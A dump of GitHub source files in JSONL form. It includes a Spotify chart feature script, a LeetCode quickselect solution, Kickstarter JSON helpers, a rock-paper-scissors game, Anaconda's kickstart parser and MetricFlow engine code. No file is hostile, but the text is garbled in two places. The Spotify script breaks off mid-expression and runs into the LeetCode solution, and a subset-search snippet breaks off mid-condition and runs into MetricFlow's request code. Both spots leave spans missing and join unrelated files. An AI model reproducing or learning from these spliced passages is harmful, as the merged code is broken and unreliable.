cv2.destroyAllWindows()\r\n\r\n\r\n\r\n","repo_name":"chanshu19/screen-recorder","sub_path":"Screen_Recorder.py","file_name":"Screen_Recorder.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19397001569","text":"\"\"\"Prepare features for Spotify genre critique analog\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport string\nimport matplotlib.pyplot as plt\nimport ast\n\n# Stich records together\nframe=[]\nfile_list=['number']+list(string.ascii_uppercase)\n\nfor fname in file_list:\n\tfpath='data/typ_paper_1b/'+fname+'.tsv'\n\tdf=pd.read_csv(fpath,sep='\\t',encoding='utf8')\n\tframe.append(df)\n\ndf=pd.concat(frame,ignore_index=True)\ndf=df.dropna()\n\nchart_path = 'data/chart_record.tsv'\nchart=pd.read_csv(chart_path,sep='\\t',index_col=0,encoding='utf8')\ndf_c=df.merge(chart)\n\ndf['peak']=0\ndf['week']=0\ndf['long']=False\ndf['decade']=0\ndf.release=pd.to_datetime(df.release)\n\n# Expand genre \ngenres=['hip','rap','rock','metal','folk','country','blues','r&b','soul','disco','funk','pop','none']\nfor g in genres:\n\tdf[g]=0\nfor x in df.iterrows():\n\tgv=[1 if x[1].genre==g else 0 for g in range(len(genres))]\n\tdf.loc[x[0],genres]=gv\n\n# Find peak position and weeks on chart for each song along with control for long songs and time block\nfor x in df.iterrows():\n\tprint(x[0])\n\tartist=x[1].artist\n\ttitle=x[1].title\n\trelease=x[1].release\n\tduration_ms=x[1].duration_ms\n\tlabels=x[1].label\n\tlabels=ast.literal_eval(labels)\n\n\tdecade=np.floor((release-np.datetime64('1957','Y'))/np.timedelta64(52,'W')/5)\n\tchart_weeks=max(df_c.loc[(df_c.artist==artist) & (df_c.title==title),'week'])\n\tpeak=min(df_c.loc[(df_c.artist==artist) & (df_c.title==title),'peak'])\n\tlen_record=df.loc[(df.release<=release) & (df.release>=release-np.timedelta64(52,'W')),'duration_ms'].tolist()\n\tlong_threshold=np.mean(len_record)+np.std(len_record)*2\n\n\tdf.loc[(df.artist==artist) & (df.title==title),['week','long','peak','decade']]=[chart_weeks,\n\t\tlong_threshold int:\n k = len(nums) - k #index we are looking for after sorted\n \n def quickSelect(l, r):\n # partition\n p, pivot = l, nums[r]\n for i in range(l, r):\n if nums[i] <= pivot:\n nums[p], nums[i] = nums[i], nums[p]\n p += 1\n \n nums[p], nums[r] = nums[r], nums[p]\n \n if p > k: # meaning k is in left side\n return quickSelect(l, p - 1)\n if p < k: # meaning k is in the right side\n return 
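# Worked example for the quickselect above (the list is illustrative): for
# nums = [3, 2, 1, 5, 6, 4] and k = 2, the first line rewrites k to
# len(nums) - k = 4, the sorted index of the 2nd-largest element; partitioning
# repeats until some pivot settles exactly at index 4, where nums[p] == 5.
nums, k = [3, 2, 1, 5, 6, 4], 2
assert sorted(nums)[len(nums) - k] == 5   # the index quickSelect steers toward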
quickSelect(p + 1, r)\n else:\n return nums[p]\n \n \n return quickSelect(0, len(nums) - 1)","repo_name":"chrispangg/LeetCodeAnswers","sub_path":"0215-kth-largest-element-in-an-array/0215-kth-largest-element-in-an-array.py","file_name":"0215-kth-largest-element-in-an-array.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"10584854870","text":"from pathlib import Path\n\nfrom r2t2.static_parser import locate_references\n\n\nHERE = Path(__file__).parent\nFIXTURES = HERE / \"fixtures\"\nSAMPLE_PATH = FIXTURES / \"sample_code.py\"\n\n\nclass TestLocateReferences:\n def test_accepts_str(self, bib_with_tracking):\n locate_references(str(SAMPLE_PATH))\n assert \"Great British Roasts, 2019\" in bib_with_tracking.references\n\n def test_accepts_path(self, bib_with_tracking):\n locate_references(SAMPLE_PATH)\n assert \"Great British Roasts, 2019\" in bib_with_tracking.references\n\n def test_globs_for_folder(self, bib_with_tracking):\n locate_references(FIXTURES)\n assert \"Great British Roasts, 2019\" in bib_with_tracking.references\n","repo_name":"ImperialCollegeLondon/R2T2","sub_path":"tests/test_static_parser.py","file_name":"test_static_parser.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"35"} +{"seq_id":"38183149273","text":"from datetime import date\nfrom numpy import datetime64\nimport pandas as pd\nimport json\nimport os\nfrom pathlib import Path\n\nkeys_to_keep = [\"name\", \"goal\", \"pledged\", \"state\", \"slug\",\n \"country\", \"currency\", 'state_changed_at',\n \"deadline\", \"created_at\", \"launched_at\",\n \"backers_count\", \"usd_pledged\",\n 'usd_pledged',\n \"creator\"]\n\nall_keys = ['id', 'photo', 'name', 'blurb', 'goal', 'pledged',\n 'state', 'slug', 'disable_communication', 'country',\n 'country_displayable_name', 'currency', 'currency_symbol',\n 'currency_trailing_code', 'deadline', 'state_changed_at',\n 'created_at', 'launched_at', 'staff_pick', 'is_starrable',\n 'backers_count', 'static_usd_rate', 'usd_pledged',\n 'converted_pledged_amount', 'fx_rate', 'usd_exchange_rate',\n 'current_currency', 'usd_type', 'creator', 'location',\n 'category', 'profile', 'spotlight', 'urls', 'source_url']\n\nkeys_to_dump = [x for x in all_keys if x not in keys_to_keep]\n\ncolumns_to_keep = ['name', 'goal', 'pledged', 'state', 'slug', 'country',\n 'currency', 'deadline', 'created_at',\n 'launched_at', 'backers_count', 'usd_pledged',\n 'converted_pledged_amount', 'fx_rate',\n 'usd_exchange_rate', 'current_currency', 'usd_type', \n 'creator_name', 'state_changed_at']\n\nto_datetime_columns = ['created_at',\"launched_at\",'deadline','state_changed_at']\n\ndef unix_to_datetime(df,columns_to_change=to_datetime_columns):\n for col in columns_to_change:\n df[col] = pd.to_datetime(df[col],unit='s')\n return df\n\ndef datetime_to_unix(df):\n for col in df.columns:\n try:\n if type(df[col][0]) == pd.Timestamp:\n df[col] = df[col].astype(int) / 10**9\n except:\n print(\"Something went wrong!\")\n return df\n\ndef list_of_lines(filepath):\n with open(filepath) as fp:\n lines = fp.readlines()\n return lines\n\n\ndef build_df_from_lines_list(line_list, category=34):\n df = pd.DataFrame()\n for line in line_list:\n try:\n line_dict = json.loads(line[line.index('{\"id\":'):-2])\n if line_dict[\"category\"][\"id\"] == category:\n for key in keys_to_dump:\n try:\n line_dict.pop(key)\n except:\n continue\n df_temp 
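# Round-trip sketch for the two converters above (the timestamp is
# illustrative): unix_to_datetime() turns epoch seconds into pandas Timestamps,
# and datetime_to_unix() converts them back via nanoseconds / 10**9.
import pandas as pd
df = pd.DataFrame({'created_at': [1546300800]})             # 2019-01-01 00:00 UTC
df = unix_to_datetime(df, columns_to_change=['created_at'])
assert datetime_to_unix(df)['created_at'][0] == 1546300800.0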
= pd.json_normalize(line_dict, sep='_')\n df = pd.concat([df, df_temp])\n except:\n continue\n return df\n\ndef build_df_from_all_files_in_dir(directory = \"data/kickstarter_json/\"):\n pathlist = Path(directory).glob('**/*.json')\n df_all = pd.DataFrame()\n counter = 0\n for path in pathlist:\n file_path = str(path)\n print(file_path)\n lines = list_of_lines(file_path)\n df_temp = build_df_from_lines_list(lines)\n df_all = pd.concat([df_all, df_temp])\n counter += 1\n print(f\"{counter} files have been dataframed\")\n return df_all\n\n\ndef clean_df(df,cols_to_keep=columns_to_keep):\n df = df[columns_to_keep]\n df = unix_to_datetime(df)\n try:\n df.rename({\"name\":\"game_name\"},axis=1,inplace=True)\n except:\n print(\"ERROR: Could not find columns name 'name'\")\n try:\n df = df.astype({'usd_pledged': f\"{'float64'}\"}).round(2)\n except:\n print(\"ERROR: Could not round or find column name 'usd_pledged'\")\n df['game_name'] = df['game_name'].str.findall(r'\\w|\\s').str.join('').str.replace(r\"\\s+\",\"_\").str.lower()\n return df\n\n\ndef list_of_categories(filepath, dumpfile=False):\n # read file\n with open(filepath) as fp:\n lines = fp.readlines()\n # build dict with all the category ids and \"slug\" names\n category_dict = dict()\n for line in lines:\n line_dict = json.loads(line[line.index('{\"id\":'):-2])\n category_dict[line_dict[\"category\"][\"id\"]\n ] = line_dict[\"category\"][\"slug\"]\n # build list from dict and sort it\n list_of_categories = []\n for key, value in category_dict.items():\n list_of_categories.append([key, value])\n list_of_categories.sort()\n # dump result into file\n if dumpfile:\n with open(\"kickstarter_categories.txt\", \"w\") as fp:\n for item in list_of_categories:\n fp.writelines(f\"id: {item[0]} ---> {item[1]}\\n\")\n return list_of_categories\n\n\ndef rename_kickstarter_files(directory):\n for filename in os.listdir(directory):\n # Construct old file name\n source = f\"{directory}{filename}\"\n # Adding the count to the new file name and extension\n if filename.startswith(\"Kickstarter\"):\n destination = f\"{directory}{filename[12: 22]}.json\"\n # Renaming the file\n os.rename(source, destination)\n print(f\"Renamed: {source} ---> {destination}\")\n","repo_name":"Daily-Lama-Capstone/Daily-Lama-Capstone","sub_path":"capstone_json_functions.py","file_name":"capstone_json_functions.py","file_ext":"py","file_size_in_byte":4956,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"24282367178","text":"import random\r\nrock = \"\"\"\r\n _______\r\n---' ____)\r\n (_____)\r\n (_____)\r\n (____)\r\n---.__(___)\r\n\"\"\"\r\nscissor = \"\"\"\r\n _______\r\n---' ____)____\r\n ______)\r\n __________)\r\n (____)\r\n---.__(___)\r\n\"\"\"\r\npaper = \"\"\"\r\n _______\r\n---' ____)____\r\n ______)\r\n _______)\r\n _______)\r\n---.__________)\r\n\"\"\"\r\ngame = [rock, scissor, paper]\r\ngame2= ['rock', 'scissor', 'paper']\r\ncomputer_hand = random.choice(game2)\r\nprint(\"Welcome to Biswadeep Datta's brand new game Rock Paper Scissor.Rules: Type rock or scissor or paper\")\r\nuser_hand = input(\"Enter your turn among rock paper scissor \")\r\nprint(\"You chose:\")\r\nif(user_hand=='rock'):\r\n print(rock)\r\nif(user_hand=='paper'):\r\n print(paper)\r\n\r\nif(user_hand=='scissor'):\r\n print(scissor)\r\n\r\nprint(\"Computer chose: \")\r\n\r\nif computer_hand=='rock':\r\n\r\n print(rock)\r\n if computer_hand==user_hand:\r\n print(\"Draw\")\r\n \r\n \r\n if user_hand=='paper':\r\n print(\"You win\")\r\n if 
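# Sketch of a data-driven alternative to the nested ifs in this game (a
# refactoring suggestion, not original code): map each hand to the hand it
# beats, then one comparison decides the round.
BEATS = {'rock': 'scissor', 'scissor': 'paper', 'paper': 'rock'}

def outcome(user, computer):
    if user == computer:
        return "Draw"
    return "You win" if BEATS[user] == computer else "You lose"

# e.g. outcome('paper', 'rock') == "You win", matching the branches above.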
user_hand=='scissor':\r\n print(\"You lose\")\r\n\r\n\r\n\r\nif computer_hand=='paper':\r\n print(paper)\r\n \r\n \r\n \r\n if computer_hand==user_hand:\r\n print(\"Draw\")\r\n if user_hand=='scissor':\r\n print(\"You win\")\r\n if user_hand=='rock':\r\n print(\"You lose\")\r\n\r\n\r\n\r\nif computer_hand=='scissor':\r\n print(scissor)\r\n if computer_hand==user_hand:\r\n print(\"Draw\")\r\n if user_hand=='rock':\r\n print(\"You win\")\r\n if user_hand=='paper':\r\n print(\"You lose\")\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"biswadeepdatta77/Rock-Paper-Scissor-Game","sub_path":"Rock_Paper_Scissor.py","file_name":"Rock_Paper_Scissor.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"74984389860","text":"__all__ = [\"SplitKickstartParser\", \"VALID_SECTIONS_ANACONDA\"]\n\nfrom pykickstart.parser import KickstartParser\nfrom pykickstart.sections import Section\n\nfrom pyanaconda.modules.boss.kickstart_manager.element import KickstartElement,\\\n TrackedKickstartElements\n\nVALID_SECTIONS_ANACONDA = [\n \"%pre\", \"%pre-install\", \"%post\", \"%onerror\", \"%traceback\", \"%packages\", \"%addon\"\n]\n\n\nclass StoreSection(Section):\n \"\"\"Section for storing section content and header line references.\n\n Similarly as NullSection defines a section that parser will recognize (ie\n will not raise an error). The section will pass itself to an object for storing\n sections if supplied.\n \"\"\"\n\n allLines = True\n\n def __init__(self, *args, **kwargs):\n \"\"\"Create a new StoreSection instance.\n\n You must pass a sectionOpen parameter (including a leading '%') for the\n section to make it valid but just ignored. If you want to store the\n content, supply a store argument.\n\n Required kwargs:\n sectionOpen - section name, including '%' starting character\n\n Optional kwargs:\n store - an instance of an object for storing the section\n (SplitKickstartParser) which must provide\n add_section(StoreSection) method\n\n attributes:\n header_lineno - section header line in kickstart file\n args - section header parsed by KickstartParser (shlex)\n lines - list of section body lines\n \"\"\"\n super().__init__(*args, **kwargs)\n self.sectionOpen = kwargs.get(\"sectionOpen\")\n self._store = kwargs.get(\"store\", None)\n self.header_lineno = 0\n self.args = []\n self.lines = []\n\n def handleHeader(self, lineno, args):\n self.header_lineno = lineno\n self.args = args\n\n def handleLine(self, line):\n self.lines.append(line)\n\n def finalize(self):\n if self._store is not None:\n self._store.add_section(self)\n self.header_lineno = 0\n self.args = []\n self.lines = []\n\n\nclass SplitKickstartParser(KickstartParser):\n \"\"\"Kickstart parser for storing kickstart elements.\n\n Stores kickstart elements (commands, sections, addons) with their line\n number and file name references to kickstart file.\n Does not do any actual command or section parsing (ie command syntax\n checking).\n\n :raises KickstartParseError: on invalid section\n :raises KickstartError: on missing %include unless instantiated with\n missing_include_is_fatal=False\n \"\"\"\n\n # file name to be used in case of parsing string if not supplied\n unknown_filename = \"
\"\n\n def __init__(self, handler, valid_sections=None, missing_include_is_fatal=True):\n \"\"\"Initialize the parser.\n\n :param valid_sections: list of valid section names (including '%')\n :type valid_sections: list(str)\n :param missing_include_is_fatal: raise KickstartError if included file\n is not found\n :type missing_include_is_fatal: bool\n \"\"\"\n\n self._valid_sections = valid_sections or []\n # calls setupSections\n super().__init__(handler, missingIncludeIsFatal=missing_include_is_fatal)\n self._current_ks_filename = self.unknown_filename\n self._result = TrackedKickstartElements()\n\n @property\n def valid_sections(self):\n \"\"\"List of valid kickstart sections\"\"\"\n return list(self._valid_sections)\n\n @valid_sections.setter\n def valid_sections(self, value):\n self._valid_sections = value\n\n def split(self, filename):\n \"\"\"Split the kickstart file into elements.\n\n :param filename: name of kickstart file\n :type filename: str\n\n :return: object containing kickstart elements with references to\n kickstart files\n :rtype: KickstartElements\n \"\"\"\n with open(filename, \"r\") as f:\n kickstart = f.read()\n return self.split_from_string(kickstart, filename=filename)\n\n def split_from_string(self, kickstart, filename=None):\n \"\"\"Split the kickstart given as string into elements.\n\n :param kickstart: kickstart to be split\n :type kickstart: str\n :param filename: filename to be used as file reference in the result\n :type filename: str\n\n :return: object containing kickstart elements with references to\n kickstart\n :rtype: KickstartElements\n \"\"\"\n self._reset()\n self._current_ks_filename = filename or self.unknown_filename\n self.readKickstartFromString(kickstart)\n return self._result\n\n def add_section(self, section):\n \"\"\"Adds a StoreSection to the result.\"\"\"\n element = KickstartElement(section.args, section.lines,\n section.header_lineno, self._current_ks_filename)\n self._result.append(element)\n\n def _reset(self):\n self._result = TrackedKickstartElements()\n self.setupSections()\n\n def _handleInclude(self, f):\n \"\"\"Overrides parent to keep track of include file names.\"\"\"\n parent_file = self._current_ks_filename\n self._current_ks_filename = f\n super()._handleInclude(f)\n self._current_ks_filename = parent_file\n\n def handleCommand(self, lineno, args):\n \"\"\"Overrides parent method to store the command.\"\"\"\n element = KickstartElement(args, [self._line], lineno, self._current_ks_filename)\n self._result.append(element)\n\n def setupSections(self):\n \"\"\"Overrides parent method to store sections.\"\"\"\n self._sections = {}\n for section in self._valid_sections:\n self.registerSection(StoreSection(self.handler,\n sectionOpen=section,\n store=self))\n","repo_name":"rhinstaller/anaconda","sub_path":"pyanaconda/modules/boss/kickstart_manager/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","stars":494,"dataset":"github-code","pt":"35"} +{"seq_id":"42422145425","text":"import sys\nsys.stdin = open('input2.txt')\n\ndef subset(n, su):\n global visit, count\n if n == len(score):\n if not visit & (1< MetricFlowQueryRequest:\n return MetricFlowQueryRequest(\n request_id=MetricFlowRequestId(mf_rid=f\"{random_id()}\"),\n metric_names=metric_names,\n group_by_names=group_by_names,\n limit=limit,\n time_constraint_start=time_constraint_start,\n time_constraint_end=time_constraint_end,\n where_constraint=where_constraint,\n order_by_names=order_by_names,\n 
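# Usage sketch for SplitKickstartParser above ('handler' is assumed to come
# from pykickstart's usual handler machinery; the kickstart text is
# illustrative):
parser = SplitKickstartParser(handler, valid_sections=VALID_SECTIONS_ANACONDA)
elements = parser.split_from_string("%post\necho done\n%end\n", filename="ks.cfg")
# 'elements' is a TrackedKickstartElements that maps each command and section
# back to its line number and source file without validating command syntax.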
output_table=output_table,\n sql_optimization_level=sql_optimization_level,\n query_type=query_type,\n )\n\n\n@dataclass(frozen=True)\nclass MetricFlowQueryResult: # noqa: D\n \"\"\"The result of a query and context on how it was generated.\"\"\"\n\n query_spec: MetricFlowQuerySpec\n dataflow_plan: DataflowPlan[SemanticModelDataSet]\n sql: str\n result_df: Optional[pd.DataFrame] = None\n result_table: Optional[SqlTable] = None\n\n\n@dataclass(frozen=True)\nclass MetricFlowExplainResult:\n \"\"\"Returns plans for resolving a query.\"\"\"\n\n query_spec: MetricFlowQuerySpec\n dataflow_plan: DataflowPlan[SemanticModelDataSet]\n execution_plan: ExecutionPlan\n output_table: Optional[SqlTable] = None\n\n @property\n def rendered_sql(self) -> SqlQuery:\n \"\"\"Return the SQL query that would be run for the given query.\"\"\"\n if len(self.execution_plan.tasks) != 1:\n raise NotImplementedError(\n f\"Multiple tasks in the execution plan not yet supported. Got tasks: {self.execution_plan.tasks}\"\n )\n\n sql_query = self.execution_plan.tasks[0].sql_query\n if not sql_query:\n raise NotImplementedError(\n f\"Execution plan tasks without a SQL query not yet supported. Got tasks: {self.execution_plan.tasks}\"\n )\n\n return sql_query\n\n @property\n def rendered_sql_without_descriptions(self) -> SqlQuery:\n \"\"\"Return the SQL query without the inline descriptions.\"\"\"\n sql_query = self.rendered_sql\n return SqlQuery(\n sql_query=\"\\n\".join(\n filter(\n lambda line: not line.strip().startswith(\"--\"),\n sql_query.sql_query.split(\"\\n\"),\n )\n ),\n bind_parameters=sql_query.bind_parameters,\n )\n\n\nclass AbstractMetricFlowEngine(ABC):\n \"\"\"Query interface for clients.\"\"\"\n\n @abstractmethod\n def query(\n self,\n mf_request: MetricFlowQueryRequest,\n ) -> MetricFlowQueryResult:\n \"\"\"Query for metrics.\"\"\"\n pass\n\n @abstractmethod\n def explain(\n self,\n mf_request: MetricFlowQueryRequest,\n ) -> MetricFlowExplainResult:\n \"\"\"Similar to query - returns the query that would have been executed.\"\"\"\n pass\n\n @abstractmethod\n def simple_dimensions_for_metrics(self, metric_names: List[str]) -> List[Dimension]:\n \"\"\"Retrieves a list of all common dimensions for metric_names.\n\n \"simple\" dimensions are the ones that people expect from a UI perspective. 
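# Construction sketch (the metric and group-by names are illustrative, not
# taken from this file): requests go through the factory so that each one gets
# a random MetricFlowRequestId.
request = MetricFlowQueryRequest.create_with_random_request_id(
    metric_names=["bookings"],
    group_by_names=["metric_time"],
    limit=100,
)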
For example, if \"ds\" is a time\n dimension at a day granularity, this would not list \"ds__week\".\n\n Args:\n metric_names: Names of metrics to get common dimensions from.\n\n Returns:\n A list of Dimension objects containing metadata.\n \"\"\"\n pass\n\n @abstractmethod\n def entities_for_metrics(self, metric_names: List[str]) -> List[Entity]:\n \"\"\"Retrieves a list of all entities for metric_names.\n\n Args:\n metric_names: Names of metrics to get common entities from.\n\n Returns:\n A list of Entity objects containing metadata.\n \"\"\"\n pass\n\n @abstractmethod\n def list_metrics(self) -> List[Metric]:\n \"\"\"Retrieves a list of metric names.\n\n Returns:\n A list of Metric objects containing metadata.\n \"\"\"\n pass\n\n @abstractmethod\n def get_dimension_values(\n self,\n metric_name: str,\n get_group_by_values: str,\n time_constraint_start: Optional[datetime.datetime] = None,\n time_constraint_end: Optional[datetime.datetime] = None,\n ) -> List[str]:\n \"\"\"Retrieves a list of dimension values given a [metric_name, get_group_by_values].\n\n Args:\n metric_name: Name of metric that contains the group_by.\n get_group_by_values: Name of group_by to get values from.\n time_constraint_start: Get data for the start of this time range.\n time_constraint_end: Get data for the end of this time range.\n\n Returns:\n A list of dimension values as string.\n \"\"\"\n pass\n\n @abstractmethod\n def explain_get_dimension_values( # noqa: D\n self,\n metric_name: str,\n get_group_by_values: str,\n time_constraint_start: Optional[datetime.datetime] = None,\n time_constraint_end: Optional[datetime.datetime] = None,\n ) -> MetricFlowExplainResult:\n \"\"\"Returns the SQL query for get_dimension_values.\n\n Args:\n metric_name: Name of metric that contains the group_by.\n get_group_by_values: Name of group_by to get values from.\n time_constraint_start: Get data for the start of this time range.\n time_constraint_end: Get data for the end of this time range.\n\n Returns:\n An object with the rendered SQL and generated plans.\n \"\"\"\n pass\n\n\nclass MetricFlowEngine(AbstractMetricFlowEngine):\n \"\"\"Main entry point for queries.\"\"\"\n\n @staticmethod\n def from_config(handler: YamlFileHandler) -> MetricFlowEngine:\n \"\"\"Initialize MetricFlowEngine via yaml config file.\"\"\"\n sql_client = make_sql_client_from_config(handler)\n\n # Ideally we should put this getting of of CONFIG_DBT_REPO in a helper\n semantic_manifest_lookup = SemanticManifestLookup(build_semantic_manifest_from_config(handler))\n system_schema = not_empty(handler.get_value(CONFIG_DWH_SCHEMA), CONFIG_DWH_SCHEMA, handler.url)\n return MetricFlowEngine(\n semantic_manifest_lookup=semantic_manifest_lookup,\n sql_client=sql_client,\n system_schema=system_schema,\n )\n\n def __init__(\n self,\n semantic_manifest_lookup: SemanticManifestLookup,\n sql_client: SqlClient,\n system_schema: str,\n time_source: TimeSource = ServerTimeSource(),\n column_association_resolver: Optional[ColumnAssociationResolver] = None,\n time_spine_source: Optional[TimeSpineSource] = None,\n ) -> None:\n \"\"\"Initializer for MetricFlowEngine.\n\n For direct calls to construct MetricFlowEngine, do not pass the following parameters,\n - time_source\n - column_association_resolver\n - time_spine_source\n These parameters are mainly there to be overridden during tests.\n \"\"\"\n self._semantic_manifest_lookup = semantic_manifest_lookup\n self._sql_client = sql_client\n self._column_association_resolver = column_association_resolver or (\n 
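# End-to-end sketch (the config handler is an assumption): build an engine from
# a yaml config, then run the request sketched earlier.
engine = MetricFlowEngine.from_config(handler)   # handler: a YamlFileHandler
result = engine.query(request)                   # a MetricFlowQueryResult
print(result.sql)         # the SQL that was executed
print(result.result_df)   # pandas DataFrame; may be None if written to a table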
DunderColumnAssociationResolver(semantic_manifest_lookup)\n )\n self._time_source = time_source\n self._time_spine_source = time_spine_source or TimeSpineSource(schema_name=system_schema)\n\n self._schema = system_schema\n\n self._source_data_sets: List[SemanticModelDataSet] = []\n converter = SemanticModelToDataSetConverter(column_association_resolver=self._column_association_resolver)\n for semantic_model in self._semantic_manifest_lookup.semantic_manifest.semantic_models:\n data_set = converter.create_sql_source_data_set(semantic_model)\n self._source_data_sets.append(data_set)\n logger.info(f\"Created source dataset from semantic model '{semantic_model.name}'\")\n\n source_node_builder = SourceNodeBuilder(self._semantic_manifest_lookup)\n source_nodes = source_node_builder.create_from_data_sets(self._source_data_sets)\n\n node_output_resolver = DataflowPlanNodeOutputDataSetResolver[SemanticModelDataSet](\n column_association_resolver=DunderColumnAssociationResolver(semantic_manifest_lookup),\n semantic_manifest_lookup=semantic_manifest_lookup,\n time_spine_source=self._time_spine_source,\n )\n\n self._dataflow_plan_builder = DataflowPlanBuilder[SemanticModelDataSet](\n source_nodes=source_nodes,\n semantic_manifest_lookup=self._semantic_manifest_lookup,\n time_spine_source=self._time_spine_source,\n )\n self._to_sql_query_plan_converter = DataflowToSqlQueryPlanConverter[SemanticModelDataSet](\n column_association_resolver=self._column_association_resolver,\n semantic_manifest_lookup=self._semantic_manifest_lookup,\n time_spine_source=self._time_spine_source,\n )\n self._to_execution_plan_converter = DataflowToExecutionPlanConverter[SemanticModelDataSet](\n sql_plan_converter=self._to_sql_query_plan_converter,\n sql_plan_renderer=self._sql_client.sql_engine_attributes.sql_query_plan_renderer,\n sql_client=sql_client,\n )\n self._executor = SequentialPlanExecutor()\n\n self._query_parser = MetricFlowQueryParser(\n column_association_resolver=self._column_association_resolver,\n model=self._semantic_manifest_lookup,\n source_nodes=source_nodes,\n node_output_resolver=node_output_resolver,\n )\n\n def _generate_sql_table(self, table_name: str) -> SqlTable:\n return SqlTable.from_string(f\"{self._schema}.{table_name}\")\n\n @log_call(module_name=__name__, telemetry_reporter=_telemetry_reporter)\n def query(self, mf_request: MetricFlowQueryRequest) -> MetricFlowQueryResult: # noqa: D\n logger.info(f\"Starting query request:\\n\" f\"{indent_log_line(pformat_big_objects(mf_request))}\")\n explain_result = self._create_execution_plan(mf_request)\n execution_plan = explain_result.execution_plan\n\n if len(execution_plan.tasks) != 1:\n raise NotImplementedError(\"Multiple tasks not yet supported.\")\n\n task = execution_plan.tasks[0]\n\n logger.info(f\"Sequentially running tasks in:\\n\" f\"{execution_plan_to_text(execution_plan)}\")\n execution_results = self._executor.execute_plan(execution_plan)\n logger.info(\"Finished running tasks in execution plan\")\n\n if execution_results.contains_task_errors:\n raise ExecutionException(f\"Got errors while executing tasks:\\n{execution_results.get_result(task.task_id)}\")\n\n task_execution_result = execution_results.get_result(task.task_id)\n\n assert task_execution_result.sql, \"Task execution should have returned SQL that was run\"\n\n logger.info(f\"Finished query request: {mf_request.request_id}\")\n return MetricFlowQueryResult(\n query_spec=explain_result.query_spec,\n dataflow_plan=explain_result.dataflow_plan,\n sql=task_execution_result.sql,\n 
result_df=task_execution_result.df,\n            result_table=explain_result.output_table,\n        )\n\n    def _create_execution_plan(self, mf_query_request: MetricFlowQueryRequest) -> MetricFlowExplainResult:\n        query_spec = self._query_parser.parse_and_validate_query(\n            metric_names=mf_query_request.metric_names,\n            group_by_names=mf_query_request.group_by_names,\n            limit=mf_query_request.limit,\n            time_constraint_start=mf_query_request.time_constraint_start,\n            time_constraint_end=mf_query_request.time_constraint_end,\n            where_constraint_str=mf_query_request.where_constraint,\n            order=mf_query_request.order_by_names,\n        )\n        logger.info(f\"Query spec is:\\n{pformat_big_objects(query_spec)}\")\n\n        if self._semantic_manifest_lookup.metric_lookup.contains_cumulative_or_time_offset_metric(\n            tuple(m.as_reference for m in query_spec.metric_specs)\n        ):\n            if self._time_spine_source.time_column_granularity != TimeGranularity.DAY:\n                raise RuntimeError(\n                    f\"A time spine source with a granularity {self._time_spine_source.time_column_granularity} is not \"\n                    f\"yet supported.\"\n                )\n            logger.warning(\n                f\"Query spec requires a time spine dataset conforming to the following spec: {self._time_spine_source}. \"\n            )\n            time_constraint_updated = False\n            # Track the effective constraints so any adjustment below is applied on re-parse.\n            time_constraint_start = mf_query_request.time_constraint_start\n            time_constraint_end = mf_query_request.time_constraint_end\n            if not mf_query_request.time_constraint_start:\n                time_constraint_start = self._time_source.get_time() - datetime.timedelta(days=365)\n                logger.warning(\n                    \"A start time has not been supplied while querying for cumulative metrics. To avoid an excessive \"\n                    f\"number of rows, the start time will be changed to {time_constraint_start.isoformat()}\"\n                )\n                time_constraint_updated = True\n            if not mf_query_request.time_constraint_end:\n                time_constraint_end = self._time_source.get_time()\n                logger.warning(\n                    \"An end time has not been supplied while querying for cumulative metrics. To avoid an excessive \"\n                    f\"number of rows, the end time will be changed to {time_constraint_end.isoformat()}\"\n                )\n                time_constraint_updated = True\n            if time_constraint_updated:\n                query_spec = self._query_parser.parse_and_validate_query(\n                    metric_names=mf_query_request.metric_names,\n                    group_by_names=mf_query_request.group_by_names,\n                    limit=mf_query_request.limit,\n                    time_constraint_start=time_constraint_start,\n                    time_constraint_end=time_constraint_end,\n                    where_constraint_str=mf_query_request.where_constraint,\n                    order=mf_query_request.order_by_names,\n                )\n                logger.warning(f\"Query spec updated to:\\n{pformat_big_objects(query_spec)}\")\n\n        output_table: Optional[SqlTable] = None\n        if mf_query_request.output_table is not None:\n            output_table = SqlTable.from_string(mf_query_request.output_table)\n\n        output_selection_specs: Optional[InstanceSpecSet] = None\n        if mf_query_request.query_type == MetricFlowQueryType.DIMENSION_VALUES:\n            # Filter result by dimension columns if it's a dimension values query\n            if len(query_spec.entity_specs) > 0:\n                raise InvalidQueryException(\"Querying dimension values for entities is not allowed.\")\n            output_selection_specs = InstanceSpecSet(\n                dimension_specs=query_spec.dimension_specs,\n                time_dimension_specs=query_spec.time_dimension_specs,\n            )\n\n        dataflow_plan = self._dataflow_plan_builder.build_plan(\n            query_spec=query_spec,\n            output_sql_table=output_table,\n            output_selection_specs=output_selection_specs,\n            optimizers=(SourceScanOptimizer[SemanticModelDataSet](),),\n        )\n\n        if len(dataflow_plan.sink_output_nodes) > 1:\n            raise NotImplementedError(\n                f\"Multiple output nodes in the dataflow plan not yet supported. 
